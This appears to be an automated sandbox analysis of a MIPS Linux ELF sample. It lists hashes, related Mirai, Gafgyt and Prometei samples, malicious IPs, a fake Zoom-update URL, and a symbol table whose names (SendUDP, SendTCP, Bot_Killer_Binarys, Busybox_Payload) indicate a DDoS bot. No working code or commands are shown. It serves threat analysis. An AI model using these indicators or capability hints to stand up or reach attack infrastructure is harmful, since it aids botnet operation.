	na.elf	Get hash	malicious	Prometei	Browse
	arm5.elf	Get hash	malicious	Unknown	Browse
	x86.elf	Get hash	malicious	Mirai	Browse
	skid.mips.elf	Get hash	malicious	Unknown	Browse
	vision.arc.elf	Get hash	malicious	Mirai	Browse
	na.elf	Get hash	malicious	Prometei	Browse
	na.elf	Get hash	malicious	Prometei	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CANONICAL-ASGB	mips.elf	Get hash	malicious	Gafgyt, Mirai	Browse	91.189.91.42
	sparc.elf	Get hash	malicious	Gafgyt, Mirai	Browse	185.125.190.26
	mipsel.elf	Get hash	malicious	Gafgyt, Mirai	Browse	185.125.190.26
	arc700.elf	Get hash	malicious	Gafgyt, Mirai	Browse	91.189.91.42
	na.elf	Get hash	malicious	Prometei	Browse	91.189.91.42
	na.elf	Get hash	malicious	Prometei	Browse	91.189.91.42
	na.elf	Get hash	malicious	Prometei	Browse	91.189.91.42
	na.elf	Get hash	malicious	Prometei	Browse	91.189.91.42
	na.elf	Get hash	malicious	Prometei	Browse	91.189.91.42
	na.elf	Get hash	malicious	Prometei	Browse	91.189.91.42
RASANAIR	jhUOH.elf	Get hash	malicious	Gafgyt, Mirai	Browse	31.58.58.113
	UYyuyioy.elf	Get hash	malicious	Gafgyt, Mirai	Browse	31.58.58.113
	https://install-updated-zoom-meeting.netlify.app/	Get hash	malicious	ScreenConnect Tool	Browse	151.242.63.228
	174482136536dfff5446d5e25e836061a53621f8f7f6dd5b87c414ad927c952f844b53ca12361.dat-decoded.exe	Get hash	malicious	XWorm	Browse	31.57.97.8
	nklppc.elf	Get hash	malicious	Unknown	Browse	151.246.85.94
	splarm7.elf	Get hash	malicious	Unknown	Browse	31.57.108.70
	splx86.elf	Get hash	malicious	Unknown	Browse	31.57.133.85
	nklppc.elf	Get hash	malicious	Unknown	Browse	151.240.144.75
	nklm68k.elf	Get hash	malicious	Unknown	Browse	31.58.159.138
	resgod.arm.elf	Get hash	malicious	Mirai	Browse	94.183.89.143

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

/run/systemd/resolve/stub-resolv.conf

Download File

Process:	/tmp/GHfjfgvj.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	38
Entropy (8bit):	3.3918926446809334
Encrypted:	false
SSDEEP:	3:KkZRAkd:KaAu
MD5:	C7EA09D26E26605227076E0514A33038
SHA1:	C3F9736E9AF7BD0885578859A50B205C8FA5FC8E
SHA-256:	7E8AD76E0D200E93918CA2E93C99FF8ECD02071953BF1479819DB3AC0DBB6D07
SHA-512:	17D0088725EB9991E9EB82E8A3DE0878E45E6F394BBC2AD260AA59C786FF0AD565E145E21256425D1C0ABE15F3ECB402EBB0A6A5E1C2D5BA7A4D95EC93A2861F
Malicious:	false
Reputation:	high, very likely benign file
Preview:	nameserver 8.8.8.8.nameserver 8.8.4.4.

Static File Info

General

File type:	ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, not stripped
Entropy (8bit):	5.397324338451012
TrID:	ELF Executable and Linkable format (generic) (4004/1) 100.00%
File name:	GHfjfgvj.elf
File size:	137'211 bytes
MD5:	b3c64aaf5d1e7ead1f485fb2a03046ef
SHA1:	04134158a88d92cebe7f7d2facbf00a3c0160621
SHA256:	ddf9f926f4f02ffa8b6bc44e2054b9e3bb9a8d374072ae0ab329f2d89eb9feac
SHA512:	e99243684b91fca5b51a8f06f4597ffe5d23811b49906feb4a9a3f8ff73a629594f97f786059084eca3f6e6f01cb52a21ed99598c25fab7e0ea19ce346ad5f8a
SSDEEP:	1536:ioDn4gNyNsV1jteXbBxOmAWC2rKht6h9QppvEab7+DsOCRlM8afSp5pakeB1YwwU:7B2atRvxUsk8zLokeB1UF1GmOw1JbDBi
TLSH:	35D3B62A3A21EBFEE168823107F39F7093D5269227E09345E29CDB181F6138D5C5F7A4
File Content Preview:	.ELF.....................@.....4...X.....4. ...(....p........@...@...........................@...@...........................E...E........q.........dt.Q.................................................F.p<...'......!'.......................<...'......!...

Static ELF Info

ELF header
Class:	ELF32
Data:	2's complement, big endian
Version:	1 (current)
Machine:	MIPS R3000
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x4002b0
Flags:	0x1007
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	4
Section Header Offset:	113752
Section Header Size:	40
Number of Section Headers:	21
Header String Table Index:	18

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Link	Info	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0	0	0
.reginfo	MIPS_REGINFO	0x4000b4	0xb4	0x18	0x18	0x2	A	0	0	4
.init	PROGBITS	0x4000cc	0xcc	0x8c	0x0	0x6	AX	0	0	4
.text	PROGBITS	0x400160	0x160	0x151f0	0x0	0x6	AX	0	0	16
.fini	PROGBITS	0x415350	0x15350	0x5c	0x0	0x6	AX	0	0	4
.rodata	PROGBITS	0x4153b0	0x153b0	0x2fe0	0x0	0x2	A	0	0	16
.eh_frame	PROGBITS	0x458390	0x18390	0x4	0x0	0x3	WA	0	0	4
.ctors	PROGBITS	0x458394	0x18394	0x8	0x0	0x3	WA	0	0	4
.dtors	PROGBITS	0x45839c	0x1839c	0x8	0x0	0x3	WA	0	0	4
.jcr	PROGBITS	0x4583a4	0x183a4	0x4	0x0	0x3	WA	0	0	4
.data	PROGBITS	0x4583b0	0x183b0	0x5d0	0x0	0x3	WA	0	0	16
.got	PROGBITS	0x458980	0x18980	0x500	0x4	0x10000003	WAp	0	0	16
.sdata	PROGBITS	0x458e80	0x18e80	0x4	0x0	0x10000003	WAp	0	0	4
.sbss	NOBITS	0x458e84	0x18e84	0x28	0x0	0x10000003	WAp	0	0	4
.bss	NOBITS	0x458eb0	0x18e84	0x66b8	0x0	0x3	WA	0	0	16
.comment	PROGBITS	0x0	0x18e84	0xc60	0x0	0x0		0	0	1
.mdebug.abi32	PROGBITS	0xc60	0x19ae4	0x0	0x0	0x0		0	0	1
.pdr	PROGBITS	0x0	0x19ae4	0x20e0	0x0	0x0		0	0	4
.shstrtab	STRTAB	0x0	0x1bbc4	0x94	0x0	0x0		0	0	1
.symtab	SYMTAB	0x0	0x1bfa0	0x3280	0x10	0x0		20	318	4
.strtab	STRTAB	0x0	0x1f220	0x25db	0x0	0x0		0	0	1

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Section Mappings
<unknown>	0xb4	0x4000b4	0x4000b4	0x18	0x18	0.9834	0x4	R	0x4	.reginfo
LOAD	0x0	0x400000	0x400000	0x18390	0x18390	5.3905	0x5	R E	0x10000	.reginfo .init .text .fini .rodata
LOAD	0x18390	0x458390	0x458390	0xaf4	0x71d8	4.6688	0x6	RW	0x10000	.eh_frame .ctors .dtors .jcr .data .got .sdata .sbss .bss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x7	RWE	0x4

Symbols

Name	Section Name	Value	Size	Symbol Type	Symbol Bind	Symbol Visibility	Ndx
	.symtab	0x0	0	NOTYPE	<unknown>	DEFAULT	SHN_UNDEF
	.symtab	0x4000b4	0	SECTION	<unknown>	DEFAULT	1
	.symtab	0x4000cc	0	SECTION	<unknown>	DEFAULT	2
	.symtab	0x400160	0	SECTION	<unknown>	DEFAULT	3
	.symtab	0x415350	0	SECTION	<unknown>	DEFAULT	4
	.symtab	0x4153b0	0	SECTION	<unknown>	DEFAULT	5
	.symtab	0x458390	0	SECTION	<unknown>	DEFAULT	6
	.symtab	0x458394	0	SECTION	<unknown>	DEFAULT	7
	.symtab	0x45839c	0	SECTION	<unknown>	DEFAULT	8
	.symtab	0x4583a4	0	SECTION	<unknown>	DEFAULT	9
	.symtab	0x4583b0	0	SECTION	<unknown>	DEFAULT	10
	.symtab	0x458980	0	SECTION	<unknown>	DEFAULT	11
	.symtab	0x458e80	0	SECTION	<unknown>	DEFAULT	12
	.symtab	0x458e84	0	SECTION	<unknown>	DEFAULT	13
	.symtab	0x458eb0	0	SECTION	<unknown>	DEFAULT	14
	.symtab	0x0	0	SECTION	<unknown>	DEFAULT	15
	.symtab	0xc60	0	SECTION	<unknown>	DEFAULT	16
	.symtab	0x0	0	SECTION	<unknown>	DEFAULT	17
	.symtab	0x0	0	SECTION	<unknown>	DEFAULT	18
	.symtab	0x0	0	SECTION	<unknown>	DEFAULT	19
	.symtab	0x0	0	SECTION	<unknown>	DEFAULT	20
BIN	.symtab	0x458488	4	OBJECT	<unknown>	DEFAULT	10
BINS1	.symtab	0x458498	4	OBJECT	<unknown>	DEFAULT	10
BINS10	.symtab	0x4584bc	4	OBJECT	<unknown>	DEFAULT	10
BINS11	.symtab	0x4584c0	4	OBJECT	<unknown>	DEFAULT	10
BINS12	.symtab	0x4584c4	4	OBJECT	<unknown>	DEFAULT	10
BINS13	.symtab	0x4584c8	4	OBJECT	<unknown>	DEFAULT	10
BINS2	.symtab	0x45849c	4	OBJECT	<unknown>	DEFAULT	10
BINS3	.symtab	0x4584a0	4	OBJECT	<unknown>	DEFAULT	10
BINS4	.symtab	0x4584a4	4	OBJECT	<unknown>	DEFAULT	10
BINS5	.symtab	0x4584a8	4	OBJECT	<unknown>	DEFAULT	10
BINS6	.symtab	0x4584ac	4	OBJECT	<unknown>	DEFAULT	10
BINS7	.symtab	0x4584b0	4	OBJECT	<unknown>	DEFAULT	10
BINS8	.symtab	0x4584b4	4	OBJECT	<unknown>	DEFAULT	10
BINS9	.symtab	0x4584b8	4	OBJECT	<unknown>	DEFAULT	10
BINS_HOST_IP	.symtab	0x458484	4	OBJECT	<unknown>	DEFAULT	10
Bot_Killer_Binarys	.symtab	0x4584cc	272	OBJECT	<unknown>	DEFAULT	10
Busybox_Payload	.symtab	0x458474	4	OBJECT	<unknown>	DEFAULT	10
C.1.3455	.symtab	0x418220	24	OBJECT	<unknown>	DEFAULT	5
ClearHistory	.symtab	0x405120	124	FUNC	<unknown>	DEFAULT	3
FTP1	.symtab	0x458494	4	OBJECT	<unknown>	DEFAULT	10
Payload	.symtab	0x458478	4	OBJECT	<unknown>	DEFAULT	10
Python_File_Location	.symtab	0x458480	4	OBJECT	<unknown>	DEFAULT	10
Python_Temp_Directory	.symtab	0x45847c	4	OBJECT	<unknown>	DEFAULT	10
Q	.symtab	0x458eec	16384	OBJECT	<unknown>	DEFAULT	14
RandomPythonRange	.symtab	0x40519c	32	FUNC	<unknown>	DEFAULT	3
RemoveTempDirs	.symtab	0x406530	196	FUNC	<unknown>	DEFAULT	3
SendHTTP	.symtab	0x404ea8	632	FUNC	<unknown>	DEFAULT	3
SendSTD	.symtab	0x403b24	524	FUNC	<unknown>	DEFAULT	3
SendTCP	.symtab	0x4043d8	2324	FUNC	<unknown>	DEFAULT	3
SendUDP	.symtab	0x403d30	1704	FUNC	<unknown>	DEFAULT	3
TFTP1	.symtab	0x45848c	4	OBJECT	<unknown>	DEFAULT	10
TFTP2	.symtab	0x458490	4	OBJECT	<unknown>	DEFAULT	10
Temp_Directorys	.symtab	0x4585dc	20	OBJECT	<unknown>	DEFAULT	10
UpdateNameSrvs	.symtab	0x406428	264	FUNC	<unknown>	DEFAULT	3
_Exit	.symtab	0x407be0	92	FUNC	<unknown>	DEFAULT	3
_GLOBAL_OFFSET_TABLE_	.symtab	0x458980	0	OBJECT	<unknown>	DEFAULT	11
_Jv_RegisterClasses	.symtab	0x0	0	NOTYPE	<unknown>	DEFAULT	SHN_UNDEF
_READ.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_WRITE.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
__CTOR_END__	.symtab	0x458398	0	OBJECT	<unknown>	DEFAULT	7
__CTOR_LIST__	.symtab	0x458394	0	OBJECT	<unknown>	DEFAULT	7
__C_ctype_b	.symtab	0x4586a0	4	OBJECT	<unknown>	DEFAULT	10
__C_ctype_b.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
__C_ctype_b_data	.symtab	0x4167c0	768	OBJECT	<unknown>	DEFAULT	5
__C_ctype_tolower	.symtab	0x458950	4	OBJECT	<unknown>	DEFAULT	10
__C_ctype_tolower.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
__C_ctype_tolower_data	.symtab	0x417f20	768	OBJECT	<unknown>	DEFAULT	5
__C_ctype_toupper	.symtab	0x4586b0	4	OBJECT	<unknown>	DEFAULT	10
__C_ctype_toupper.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
__C_ctype_toupper_data	.symtab	0x416ac0	768	OBJECT	<unknown>	DEFAULT	5
__DTOR_END__	.symtab	0x4583a0	0	OBJECT	<unknown>	DEFAULT	8
__DTOR_LIST__	.symtab	0x45839c	0	OBJECT	<unknown>	DEFAULT	8
__EH_FRAME_BEGIN__	.symtab	0x458390	0	OBJECT	<unknown>	DEFAULT	6
__FRAME_END__	.symtab	0x458390	0	OBJECT	<unknown>	DEFAULT	6
__GI___C_ctype_b	.symtab	0x4586a0	4	OBJECT	<unknown>	HIDDEN	10
__GI___C_ctype_tolower	.symtab	0x458950	4	OBJECT	<unknown>	HIDDEN	10
__GI___C_ctype_toupper	.symtab	0x4586b0	4	OBJECT	<unknown>	HIDDEN	10
__GI___ctype_b	.symtab	0x4586a4	4	OBJECT	<unknown>	HIDDEN	10
__GI___ctype_tolower	.symtab	0x458954	4	OBJECT	<unknown>	HIDDEN	10
__GI___ctype_toupper	.symtab	0x4586b4	4	OBJECT	<unknown>	HIDDEN	10
__GI___errno_location	.symtab	0x407d70	24	FUNC	<unknown>	HIDDEN	3
__GI___fcntl_nocancel	.symtab	0x407af8	136	FUNC	<unknown>	HIDDEN	3
__GI___fgetc_unlocked	.symtab	0x410260	388	FUNC	<unknown>	HIDDEN	3
__GI___glibc_strerror_r	.symtab	0x409e90	68	FUNC	<unknown>	HIDDEN	3
__GI___h_errno_location	.symtab	0x40dfd0	24	FUNC	<unknown>	HIDDEN	3
__GI___libc_fcntl	.symtab	0x407a70	136	FUNC	<unknown>	HIDDEN	3
__GI___sigaddset	.symtab	0x40a878	44	FUNC	<unknown>	HIDDEN	3
__GI___sigdelset	.symtab	0x40a8a4	48	FUNC	<unknown>	HIDDEN	3
__GI___sigismember	.symtab	0x40a850	40	FUNC	<unknown>	HIDDEN	3
__GI___uClibc_fini	.symtab	0x40cdc0	204	FUNC	<unknown>	HIDDEN	3
__GI___uClibc_init	.symtab	0x40cf14	140	FUNC	<unknown>	HIDDEN	3
__GI___xpg_strerror_r	.symtab	0x409f20	388	FUNC	<unknown>	HIDDEN	3
__GI__exit	.symtab	0x407be0	92	FUNC	<unknown>	HIDDEN	3
__GI_abort	.symtab	0x40ba70	408	FUNC	<unknown>	HIDDEN	3
__GI_atoi	.symtab	0x40c3e0	28	FUNC	<unknown>	HIDDEN	3
__GI_brk	.symtab	0x411b10	112	FUNC	<unknown>	HIDDEN	3
__GI_chdir	.symtab	0x407950	92	FUNC	<unknown>	HIDDEN	3
__GI_clock_getres	.symtab	0x40d6f0	88	FUNC	<unknown>	HIDDEN	3
__GI_close	.symtab	0x407ca0	88	FUNC	<unknown>	HIDDEN	3
__GI_closedir	.symtab	0x40da70	308	FUNC	<unknown>	HIDDEN	3
__GI_config_close	.symtab	0x40e4b4	132	FUNC	<unknown>	HIDDEN	3
__GI_config_open	.symtab	0x40e538	116	FUNC	<unknown>	HIDDEN	3
__GI_config_read	.symtab	0x40dff0	1220	FUNC	<unknown>	HIDDEN	3
__GI_connect	.symtab	0x40a430	92	FUNC	<unknown>	HIDDEN	3
__GI_errno	.symtab	0x45f140	4	OBJECT	<unknown>	HIDDEN	14
__GI_execl	.symtab	0x411a10	196	FUNC	<unknown>	HIDDEN	3
__GI_execve	.symtab	0x411b80	88	FUNC	<unknown>	HIDDEN	3
__GI_exit	.symtab	0x40c680	236	FUNC	<unknown>	HIDDEN	3
__GI_fclose	.symtab	0x40e740	512	FUNC	<unknown>	HIDDEN	3
__GI_fcntl	.symtab	0x407a70	136	FUNC	<unknown>	HIDDEN	3
__GI_fflush_unlocked	.symtab	0x40ffcc	648	FUNC	<unknown>	HIDDEN	3
__GI_fgetc	.symtab	0x40fc40	264	FUNC	<unknown>	HIDDEN	3
__GI_fgetc_unlocked	.symtab	0x410260	388	FUNC	<unknown>	HIDDEN	3
__GI_fgets	.symtab	0x40fd50	212	FUNC	<unknown>	HIDDEN	3
__GI_fgets_unlocked	.symtab	0x4103f0	276	FUNC	<unknown>	HIDDEN	3
__GI_fopen	.symtab	0x40e940	28	FUNC	<unknown>	HIDDEN	3
__GI_fork	.symtab	0x407770	88	FUNC	<unknown>	HIDDEN	3
__GI_fputs_unlocked	.symtab	0x409650	124	FUNC	<unknown>	HIDDEN	3
__GI_fseek	.symtab	0x4121d0	68	FUNC	<unknown>	HIDDEN	3
__GI_fseeko64	.symtab	0x412220	392	FUNC	<unknown>	HIDDEN	3
__GI_fstat	.symtab	0x411c40	144	FUNC	<unknown>	HIDDEN	3
__GI_fwrite_unlocked	.symtab	0x4096d0	268	FUNC	<unknown>	HIDDEN	3
__GI_getc_unlocked	.symtab	0x410260	388	FUNC	<unknown>	HIDDEN	3
__GI_getdtablesize	.symtab	0x40d830	72	FUNC	<unknown>	HIDDEN	3
__GI_getegid	.symtab	0x40d750	16	FUNC	<unknown>	HIDDEN	3
__GI_geteuid	.symtab	0x40d760	16	FUNC	<unknown>	HIDDEN	3
__GI_getgid	.symtab	0x40d820	16	FUNC	<unknown>	HIDDEN	3
__GI_gethostbyname	.symtab	0x40a380	28	FUNC	<unknown>	HIDDEN	3
__GI_gethostbyname2	.symtab	0x40a3a0	132	FUNC	<unknown>	HIDDEN	3
__GI_gethostbyname2_r	.symtab	0x411010	948	FUNC	<unknown>	HIDDEN	3
__GI_gethostbyname_r	.symtab	0x414470	940	FUNC	<unknown>	HIDDEN	3
__GI_gethostname	.symtab	0x414880	204	FUNC	<unknown>	HIDDEN	3
__GI_getpagesize	.symtab	0x40d6b0	48	FUNC	<unknown>	HIDDEN	3
__GI_getpid	.symtab	0x407640	16	FUNC	<unknown>	HIDDEN	3
__GI_getrlimit	.symtab	0x411be0	88	FUNC	<unknown>	HIDDEN	3
__GI_getuid	.symtab	0x40d6e0	16	FUNC	<unknown>	HIDDEN	3
__GI_h_errno	.symtab	0x45f144	4	OBJECT	<unknown>	HIDDEN	14
__GI_htonl	.symtab	0x40a250	8	FUNC	<unknown>	HIDDEN	3
__GI_htons	.symtab	0x40a258	8	FUNC	<unknown>	HIDDEN	3
__GI_inet_addr	.symtab	0x40a330	72	FUNC	<unknown>	HIDDEN	3
__GI_inet_aton	.symtab	0x410f10	244	FUNC	<unknown>	HIDDEN	3
__GI_inet_ntoa	.symtab	0x40a30c	32	FUNC	<unknown>	HIDDEN	3
__GI_inet_ntoa_r	.symtab	0x40a260	172	FUNC	<unknown>	HIDDEN	3
__GI_inet_ntop	.symtab	0x412ca0	868	FUNC	<unknown>	HIDDEN	3
__GI_inet_pton	.symtab	0x412818	704	FUNC	<unknown>	HIDDEN	3
__GI_initstate_r	.symtab	0x40c290	328	FUNC	<unknown>	HIDDEN	3
__GI_ioctl	.symtab	0x40d940	108	FUNC	<unknown>	HIDDEN	3
__GI_isatty	.symtab	0x40a150	60	FUNC	<unknown>	HIDDEN	3
__GI_isspace	.symtab	0x407d00	44	FUNC	<unknown>	HIDDEN	3
__GI_kill	.symtab	0x407a10	92	FUNC	<unknown>	HIDDEN	3
__GI_lseek64	.symtab	0x4149e0	168	FUNC	<unknown>	HIDDEN	3
__GI_memchr	.symtab	0x410510	260	FUNC	<unknown>	HIDDEN	3
__GI_memcpy	.symtab	0x409870	308	FUNC	<unknown>	HIDDEN	3
__GI_memmove	.symtab	0x410620	824	FUNC	<unknown>	HIDDEN	3
__GI_mempcpy	.symtab	0x410d80	76	FUNC	<unknown>	HIDDEN	3
__GI_memrchr	.symtab	0x410b80	260	FUNC	<unknown>	HIDDEN	3
__GI_memset	.symtab	0x4097e0	144	FUNC	<unknown>	HIDDEN	3
__GI_mmap	.symtab	0x40d5a0	132	FUNC	<unknown>	HIDDEN	3
__GI_mremap	.symtab	0x411f80	124	FUNC	<unknown>	HIDDEN	3
__GI_munmap	.symtab	0x40d880	88	FUNC	<unknown>	HIDDEN	3
__GI_nanosleep	.symtab	0x40d8e0	92	FUNC	<unknown>	HIDDEN	3
__GI_ntohl	.symtab	0x40a240	8	FUNC	<unknown>	HIDDEN	3
__GI_ntohs	.symtab	0x40a248	8	FUNC	<unknown>	HIDDEN	3
__GI_open	.symtab	0x4075c0	124	FUNC	<unknown>	HIDDEN	3
__GI_opendir	.symtab	0x40dcc4	260	FUNC	<unknown>	HIDDEN	3
__GI_poll	.symtab	0x414820	92	FUNC	<unknown>	HIDDEN	3
__GI_raise	.symtab	0x4113d0	76	FUNC	<unknown>	HIDDEN	3
__GI_random	.symtab	0x40bc30	164	FUNC	<unknown>	HIDDEN	3
__GI_random_r	.symtab	0x40c054	172	FUNC	<unknown>	HIDDEN	3
__GI_rawmemchr	.symtab	0x410ac0	192	FUNC	<unknown>	HIDDEN	3
__GI_read	.symtab	0x4079b0	88	FUNC	<unknown>	HIDDEN	3
__GI_readdir64	.symtab	0x40dec0	272	FUNC	<unknown>	HIDDEN	3
__GI_recv	.symtab	0x40a510	92	FUNC	<unknown>	HIDDEN	3
__GI_sbrk	.symtab	0x40d770	164	FUNC	<unknown>	HIDDEN	3
__GI_select	.symtab	0x40792c	32	FUNC	<unknown>	HIDDEN	3
__GI_send	.symtab	0x40a570	92	FUNC	<unknown>	HIDDEN	3
__GI_sendto	.symtab	0x40a654	32	FUNC	<unknown>	HIDDEN	3
__GI_seteuid	.symtab	0x4074e0	212	FUNC	<unknown>	HIDDEN	3
__GI_setresuid	.symtab	0x407c40	92	FUNC	<unknown>	HIDDEN	3
__GI_setreuid	.symtab	0x4077f0	92	FUNC	<unknown>	HIDDEN	3
__GI_setsockopt	.symtab	0x40a680	124	FUNC	<unknown>	HIDDEN	3
__GI_setstate_r	.symtab	0x40bf10	324	FUNC	<unknown>	HIDDEN	3
__GI_sigaction	.symtab	0x40d630	28	FUNC	<unknown>	HIDDEN	3
__GI_signal	.symtab	0x40a760	236	FUNC	<unknown>	HIDDEN	3
__GI_sigprocmask	.symtab	0x40da10	96	FUNC	<unknown>	HIDDEN	3
__GI_sleep	.symtab	0x40c770	288	FUNC	<unknown>	HIDDEN	3
__GI_socket	.symtab	0x40a700	88	FUNC	<unknown>	HIDDEN	3
__GI_sprintf	.symtab	0x407d90	80	FUNC	<unknown>	HIDDEN	3
__GI_srandom_r	.symtab	0x40c100	400	FUNC	<unknown>	HIDDEN	3
__GI_stat	.symtab	0x414950	144	FUNC	<unknown>	HIDDEN	3
__GI_strcasecmp	.symtab	0x415130	108	FUNC	<unknown>	HIDDEN	3
__GI_strcasestr	.symtab	0x40a0d0	128	FUNC	<unknown>	HIDDEN	3
__GI_strchr	.symtab	0x409d90	248	FUNC	<unknown>	HIDDEN	3
__GI_strchrnul	.symtab	0x410dd0	248	FUNC	<unknown>	HIDDEN	3
__GI_strcmp	.symtab	0x409b70	44	FUNC	<unknown>	HIDDEN	3
__GI_strcoll	.symtab	0x409b70	44	FUNC	<unknown>	HIDDEN	3
__GI_strcpy	.symtab	0x409ca0	36	FUNC	<unknown>	HIDDEN	3
__GI_strcspn	.symtab	0x410a30	144	FUNC	<unknown>	HIDDEN	3
__GI_strdup	.symtab	0x414a90	140	FUNC	<unknown>	HIDDEN	3
__GI_strlen	.symtab	0x409ab0	184	FUNC	<unknown>	HIDDEN	3
__GI_strncpy	.symtab	0x409cd0	188	FUNC	<unknown>	HIDDEN	3
__GI_strnlen	.symtab	0x409ba0	248	FUNC	<unknown>	HIDDEN	3
__GI_strpbrk	.symtab	0x410ed0	64	FUNC	<unknown>	HIDDEN	3
__GI_strrchr	.symtab	0x410ce0	160	FUNC	<unknown>	HIDDEN	3
__GI_strspn	.symtab	0x410c90	72	FUNC	<unknown>	HIDDEN	3
__GI_strstr	.symtab	0x4099b0	256	FUNC	<unknown>	HIDDEN	3
__GI_strtok	.symtab	0x409f00	32	FUNC	<unknown>	HIDDEN	3
__GI_strtok_r	.symtab	0x410960	208	FUNC	<unknown>	HIDDEN	3
__GI_strtol	.symtab	0x40c400	28	FUNC	<unknown>	HIDDEN	3
__GI_sysconf	.symtab	0x40ca8c	748	FUNC	<unknown>	HIDDEN	3
__GI_tcgetattr	.symtab	0x40a190	176	FUNC	<unknown>	HIDDEN	3
__GI_time	.symtab	0x4076e0	16	FUNC	<unknown>	HIDDEN	3
__GI_toupper	.symtab	0x407d30	60	FUNC	<unknown>	HIDDEN	3
__GI_uname	.symtab	0x4150d0	88	FUNC	<unknown>	HIDDEN	3
__GI_vsnprintf	.symtab	0x407de0	252	FUNC	<unknown>	HIDDEN	3
__GI_wait4	.symtab	0x40d650	92	FUNC	<unknown>	HIDDEN	3
__GI_waitpid	.symtab	0x4077d0	28	FUNC	<unknown>	HIDDEN	3
__GI_wcrtomb	.symtab	0x40e5b0	108	FUNC	<unknown>	HIDDEN	3
__GI_wcsnrtombs	.symtab	0x40e660	216	FUNC	<unknown>	HIDDEN	3
__GI_wcsrtombs	.symtab	0x40e620	64	FUNC	<unknown>	HIDDEN	3
__GI_write	.symtab	0x407b80	88	FUNC	<unknown>	HIDDEN	3
__JCR_END__	.symtab	0x4583a4	0	OBJECT	<unknown>	DEFAULT	9
__JCR_LIST__	.symtab	0x4583a4	0	OBJECT	<unknown>	DEFAULT	9
__app_fini	.symtab	0x45f12c	4	OBJECT	<unknown>	HIDDEN	14
__atexit_lock	.symtab	0x458920	24	OBJECT	<unknown>	DEFAULT	10
__bss_start	.symtab	0x458e84	0	NOTYPE	<unknown>	DEFAULT	SHN_ABS
__check_one_fd	.symtab	0x40ce8c	136	FUNC	<unknown>	DEFAULT	3
__close_nameservers	.symtab	0x414320	220	FUNC	<unknown>	HIDDEN	3
__ctype_b	.symtab	0x4586a4	4	OBJECT	<unknown>	DEFAULT	10
__ctype_tolower	.symtab	0x458954	4	OBJECT	<unknown>	DEFAULT	10
__ctype_toupper	.symtab	0x4586b4	4	OBJECT	<unknown>	DEFAULT	10
__curbrk	.symtab	0x45f150	4	OBJECT	<unknown>	HIDDEN	14
__data_start	.symtab	0x4583c0	0	OBJECT	<unknown>	DEFAULT	10
__decode_dotted	.symtab	0x413010	400	FUNC	<unknown>	HIDDEN	3
__decode_header	.symtab	0x414c40	228	FUNC	<unknown>	HIDDEN	3
__deregister_frame_info	.symtab	0x0	0	FUNC	<unknown>	DEFAULT	SHN_UNDEF
__dns_lookup	.symtab	0x4131a0	2612	FUNC	<unknown>	HIDDEN	3
__do_global_ctors_aux	.symtab	0x4152e0	0	FUNC	<unknown>	DEFAULT	3
__do_global_dtors_aux	.symtab	0x400160	0	FUNC	<unknown>	DEFAULT	3
__dso_handle	.symtab	0x458e80	0	OBJECT	<unknown>	HIDDEN	12
__encode_dotted	.symtab	0x4151a0	316	FUNC	<unknown>	HIDDEN	3
__encode_header	.symtab	0x414b20	276	FUNC	<unknown>	HIDDEN	3
__encode_question	.symtab	0x414d30	172	FUNC	<unknown>	HIDDEN	3
__environ	.symtab	0x45f124	4	OBJECT	<unknown>	DEFAULT	14
__errno_location	.symtab	0x407d70	24	FUNC	<unknown>	DEFAULT	3
__errno_location.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
__exit_cleanup	.symtab	0x45f110	4	OBJECT	<unknown>	HIDDEN	14
__fcntl_nocancel	.symtab	0x407af8	136	FUNC	<unknown>	DEFAULT	3
__fgetc_unlocked	.symtab	0x410260	388	FUNC	<unknown>	DEFAULT	3
__fini_array_end	.symtab	0x458394	0	NOTYPE	<unknown>	HIDDEN	SHN_ABS
__fini_array_start	.symtab	0x458394	0	NOTYPE	<unknown>	HIDDEN	SHN_ABS
__get_hosts_byname_r	.symtab	0x414400	104	FUNC	<unknown>	HIDDEN	3
__getdents64	.symtab	0x412000	460	FUNC	<unknown>	HIDDEN	3
__getpagesize	.symtab	0x40d6b0	48	FUNC	<unknown>	DEFAULT	3
__glibc_strerror_r	.symtab	0x409e90	68	FUNC	<unknown>	DEFAULT	3
__glibc_strerror_r.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
__h_errno_location	.symtab	0x40dfd0	24	FUNC	<unknown>	DEFAULT	3
__h_errno_location.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
__init_array_end	.symtab	0x458394	0	NOTYPE	<unknown>	HIDDEN	SHN_ABS
__init_array_start	.symtab	0x458394	0	NOTYPE	<unknown>	HIDDEN	SHN_ABS
__libc_close	.symtab	0x407ca0	88	FUNC	<unknown>	DEFAULT	3
__libc_connect	.symtab	0x40a430	92	FUNC	<unknown>	DEFAULT	3
__libc_fcntl	.symtab	0x407a70	136	FUNC	<unknown>	DEFAULT	3
__libc_fork	.symtab	0x407770	88	FUNC	<unknown>	DEFAULT	3
__libc_lseek64	.symtab	0x4149e0	168	FUNC	<unknown>	DEFAULT	3
__libc_nanosleep	.symtab	0x40d8e0	92	FUNC	<unknown>	DEFAULT	3
__libc_open	.symtab	0x4075c0	124	FUNC	<unknown>	DEFAULT	3
__libc_read	.symtab	0x4079b0	88	FUNC	<unknown>	DEFAULT	3
__libc_recv	.symtab	0x40a510	92	FUNC	<unknown>	DEFAULT	3
__libc_select	.symtab	0x40792c	32	FUNC	<unknown>	DEFAULT	3
